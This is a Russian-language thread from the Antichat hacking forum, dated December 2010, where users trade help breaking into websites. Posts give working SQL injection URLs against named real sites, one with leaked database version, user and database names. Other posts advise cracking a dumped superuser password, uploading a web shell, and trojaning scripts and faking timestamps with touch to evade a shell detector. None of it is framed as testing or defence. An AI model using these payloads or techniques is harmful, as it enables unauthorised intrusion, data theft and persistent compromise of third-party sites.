29.12.2010, 16:12
|
|
Новичок
Регистрация: 26.12.2009
Сообщений: 4
С нами:
8619130
Репутация:
5
|
|
Народ, чем брутить SQl inj вида
1'+and+'1'='1
Вроде есть тулзы для брута через substring()? кинте в лс плиз
|
|
|
29.12.2010, 18:20
|
|
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
С нами:
8118326
Репутация:
-5
|
|
я знаю что там chmod 777 потому-что юзеры могут залить картинки там.
|
|
|
|
29.12.2010, 19:15
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от rootmd
я знаю что там chmod 777 потому-что юзеры могут залить картинки там.
не там, а туда..и не факт что если туда юзвери заливают картинки то там права 777...смотря как права выставленны и для какого юзверя...почитай мануал
|
|
|
|
29.12.2010, 23:28
|
|
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
С нами:
8118326
Репутация:
-5
|
|
хм....ну я 100% уверен что стойт 777, но если нет, что еще можно сделать?
имеется
1. sql injection, под суперюзером
2. phpmyadmin, нормальный юзер
|
|
|
|
29.12.2010, 23:32
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от rootmd
хм....ну я 100% уверен что стойт 777, но если нет, что еще можно сделать?
имеется
1. sql injection, под суперюзером
2. phpmyadmin, нормальный юзер
1.через скуль выведи суперь юзвря пасс, попробуй сбрутить, залей шелл через пыху..
2. попроси в привате знающих людей что бы помогли, а то вынес моск уже со своим рeсурсом 2 день..
|
|
|
|
30.12.2010, 14:00
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами:
8456812
Репутация:
55
|
|
eclipse
http://www.stigatabletennis.se/pro_objects_details.php?id=1+or+1+group+by+concat( version(),floor(rand(0)*2))having+min(0)+or+1--+
версия как бы намекае
|
|
|
|
30.12.2010, 14:11
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами:
8866466
Репутация:
564
|
|
http://www.stigatabletennis.se/pro_objects_details.php?id=-1+union+select+1,2,3,4--
Version4.1.22-Max
Uzver u1081176_stiga@pemlinweb03-backnet.crystone.net
DB db1081176_stiga_table_tennis
так что брути таблы...
upd
~d0s~ опередил )
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
31.12.2010, 01:41
|
|
Познающий
Регистрация: 04.11.2007
Сообщений: 51
С нами:
9746190
Репутация:
6
|
|
Что за скрипт умет находить шеллы?
И что можно сделать что бы не детектил..
Заливаю на сайт шелл , на следующий день его нет.
В главном каталоге лежит файлик типа "найденные шеллы" и отдельная папка с бекапами шеллов))
|
|
|
|
31.12.2010, 01:44
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами:
8866466
Репутация:
564
|
|
админ дебил попался значить ))
протроянь скрипты и не забудь про команду touch =)
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
31.12.2010, 11:20
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
очень часто поподаются бд из которых выводится только
CHARACTER_SETS
как быть в таком случае?
http://www.feb.spb.ru/news.php?id=100+union+select+1,table_name,3,4,5,6, 7+from+information_schema.tables--
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
